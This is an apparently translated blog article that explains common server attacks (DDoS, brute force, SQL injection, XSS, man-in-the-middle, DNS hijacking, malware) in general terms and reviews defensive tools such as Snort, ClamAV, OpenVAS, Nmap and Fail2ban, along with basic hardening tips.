Proven tools to protect your server from attacks
The security of the entire company depends to a large extent on the security of the server. If we do not take care of it, hackers can steal important data, exposing the company to measurable losses (and if it is sensitive data of our clients, also to the loss of a good reputation). We also risk infecting the system with malware or immobilizing the website. How do we defend ourselves against cyberattacks?
We propose tools that can help with this. Let's start with presenting what types of attacks can be carried out on our server or services running on the server.
What types of server attacks are there? 7 examples
A DOS (Denial Of Service) attack is overloading the server with a huge number of simultaneous requests. This means a sharp increase in the number of visits to the website made by hacking bots. The server is unable to cope with so much traffic and the website stops working.
In the case of DDOS (Distributed Denial Of Service), the attack occurs from many different locations. Hackers carry it out using botnets - a network of computers (up to tens of thousands of machines) that they have infected with malware. While using computers, their owners unknowingly connect to the attacked website.
- Brute force
A brute force attack is an attempt to guess a user's (usually administrator) password by continuously querying successive combinations of passwords. The attacker's software checks every possible combination and if it exhausts all combinations in a given password length, it proceeds to try with longer passwords. The solution to this problem is the use of strong passwords (at least a dozen or so characters, the use of uppercase and lowercase letters, numbers, special characters) and the use of software that blocks access to the service in case of too many failed login attempts (this does not completely eliminate the problem in the case of easy passwords, but significantly extends the process of breaking them). A brute force attack can also be a dictionary attack, i.e. instead of generic passwords (all combinations), it attacks a given service by entering words from a previously defined dictionary. The best practice is therefore to create unique and generic passwords for each service and store them in secure places (e.g. password storage applications like Keepass, Bitwarden).
- SQL Injection
SQL is a language that we operate at the level of data management in databases (including their downloading, updating, deleting). Each user using the software or website sends an SQL query to the database (executed by the source code) in order to retrieve or manipulate the data on which he is currently operating.
SQL injection is an introduction of an unauthorized fragment of a SQL query by modifying the information sent to the server (usually another, harmful query is added here). In this way, a hacker can, for example, modify the information present in the database or obtain logins and passwords, and even delete all data from the database. This is possible if the server or application has vulnerabilities and the only way to fix the problem is to detect and "patch" them. Special software helps in this - vulnerability scanners as well as audits of specialists in terms of security.
- Cross-site scripting (XSS)
Similarly to the technique related to SQL Injection, XSS uses situations when there are security gaps in applications on the external side (the one visible to the user) (e.g. the displayed data is not properly sanitized). Cross-site scripting involves injecting code that allows you to run malicious scripts or obtain confidential information directly from the server. Vulnerability scanners are also helpful here.
A MITM (man-in-the-middle) hacker tries to eavesdrop on communication between two people on a network (sets up himself in the middle - hence the name). Messages are hijacked by a hacker, but they can also be modified before they reach the intended recipient. A good solution to this problem is to use strong data encryption (e.g. using an SSL connection) or utilizing a VPN between two nodes on the network.
- DNS overtaking
This attack redirects the user to a website created by hackers which at the same time looks like the original site. The visitor is not aware that he/she has come to a dangerous site because he/she entered a known and trusted address. In this way, criminals can, for example, steal login or credit card details. The solution is to ensure that there are no security holes in the software that handles DNS zones and to use reputable DNS providers.
Malware is software that hackers install on servers and users' computers in order to perform an action requested by criminals. There are many types of malware. These include viruses, bots, spyware or Trojans.
One of the popular methods of spreading malware is the so-called drive-by attack. It involves placing a script in the code of a poorly secured website that allows malware to spread. Website visitors, who is not very well protected with any antivirus/antimalware software, automatically download malware onto their device.
Useful tools to protect your server from attacks
- Snort (open source)
Snort is used to analyze server traffic in real time. It helps prevent intrusions as it detects anomalies and abuses using advanced rules
When there is a threat, the user receives an alert and the software can stop the dangerous data packets. It has access to information about their nature, because it acts as the so-called packet sniffer. This means that it is able to intercept transmitted data.
- Avast Server Antivirus
Avast Server Antivirus is based on cloud computing and machine learning technology. Thanks to this, it is able to effectively prevent attacks on servers. It sends alerts to administrators so that they can assess if there is a threat and also generates extensive reports.
The software also scans your email to filter out dangerous messages and has a built-in VPN and data shredder. Managing it is simple and intuitive.
- ClamAV (open source)
ClamAV is a free and extremely powerful virus scanner. It works in multi-threaded mode, thanks to which it protects the server in real time, even if it handles many data packets.
It is a cross-platform tool, so it can be used on devices with different operating systems operating on the same network. Virus and malware signatures update automatically, which has a positive effect on security. It can be used via a command-line interface or a graphical interface with ClamTK.
- Zabbix (open source)
Zabbix is an advanced tool for monitoring server performance. You can use it to create appropriate rules, based on which the software will send notifications regarding any anomaly in the stable operation of the server.
With its help, we can monitor any service, running on the server, both in terms of its overall operation and the server resources it uses. This allows us to counteract any attacks that serve to deliberately destabilize the server's fluidity. It also makes it possible to react quickly in case of unavailability of operation of certain services on the server. This tool is also very helpful in optimizing the performance of the server, as well as the applications running on it.
- Wireshark (open source)
Wireshark is a free network protocol analyzer that is great for network monitoring. It allows you to capture data packets and check their content to detect potentially dangerous ones.
The software is able to capture data reaching the server from various sources: LAN, Wi-Fi, Bluetooth or via USB. For a new user, it can be a bit difficult to use and requires some effort to master. At the same time, the extensive community that uses this software can help here.
- OpenVAS (open source)
OpenVAS is a vulnerability scanner, i.e. a tool that allows you to detect vulnerabilities in the system that can be used by hackers to carry out an attack. The software is able to detect 26,000 types of vulnerabilities.
The big advantage of OpenVAS is an active community of programmers who improve the tool and create plugins for it. Plug-ins allow you to customize it to your needs, which makes it very versatile.
Nessus is a paid alternative to OpenVAS. What sets it apart is that it has an extremely low rate of reporting false positives. This significantly reduces the amount of work for server administrators.
Nessus detects software errors and incorrect configurations of operating systems and IT devices. Unlike OpenVAS, it comes with pre-configured scanning policies and templates for various types of IT assets. It detects 50,000 types of vulnerabilities and supports 130,000 plugins. The disadvantage of Nessus, however, is the high price.
- Sentry (open source)
Sentry is monitoring the performance of applications running on the server. The software records every error that occurred in the running application and informs predefined people (usually technical and management people in the project) about it.
The tool is very helpful in responding quickly to application malfunctions. Technical people do not have to review logs on an ongoing basis, because the software does it for them, reporting in real time any errors that appear in the software.
An additional advantage of Sentry is the grouping of errors, recording additional information for each error (regarding browser, IP, etc.), and the clear presentation of logs in a graphical interface (instead of raw file-based logs).
Sentry allows you to react quickly when software malfunctions and errors are generated, through intentional misuse of the program. It looks for security vulnerabilities.
- Nmap (open source)
Nmap is a tool for vulnerability checking, port scanning, detecting devices and services running on the system, and network mapping. It is a recognized and standard solution for these applications.
Security vulnerabilities can be discovered during network penetration testing. This is a kind of hacking attack on your own network to test its vulnerability to the actions of real cybercriminals. Nmap is perfect for this purpose.
The tool works on multiple operating systems and is easy to use. They can be operated both via the command line and the graphical interface. A large community of developers has grown around Nmap, so the program is constantly updated.
- Fail2ban (open source)
Fail2ban analyzes the logs associated with connecting to the server and catches any anomalies that have been predefined by the administrator. If an anomaly occurs, the specific IP that led to it can be temporarily or permanently blocked. This makes it possible to counter brute-force attacks on specific services and applications, as well as to counter DDoS attacks from the software side.
Hackers don't sleep - prepare your server for them
The number of cyberattacks continues to grow. Hackers are also perfecting their methods, to which server security specialists must react. Criminals are increasingly using artificial intelligence and machine learning technology, making it easier for them to carry out effective attacks.
Therefore, it is absolutely necessary to constantly monitor the network, detect server vulnerabilities and protect yourself against viruses and malware. The above tools can be an effective weapon against hackers, which is confirmed by their popularity among developers around the world.
However, in addition to the right software, additional security firewalls, such as:
- using strong passwords and SSH keys to connect to the server
- restricting access to critical services to a specific pool of IP addresses (preferably using a VPN)
- constantly updating the software running on the server, upgrading the version of libraries in the applications installed on the server
- tracking hacking sites to quickly respond to any 0-day vulnerabilities that our server or running application may be susceptible to
- taking care of current and secure server backup
- use of non-standard server configurations (e.g., different than the default port for SSH connections)
- restrict and hide open ports on the server
It should also be remembered that often the weakest security barrier, is itself.... man. You should be careful, especially if you are the administrator of a particular server or application, because hackers often exploit the weakness of the human factor, to gain unauthorized access.
You should always pay attention to what you click on and what you communicate to other people - we should always apply the principle of limited trust here and check whether the intentions of those who contact us are definitely sincere. Otherwise we can expose ourselves to serious problems.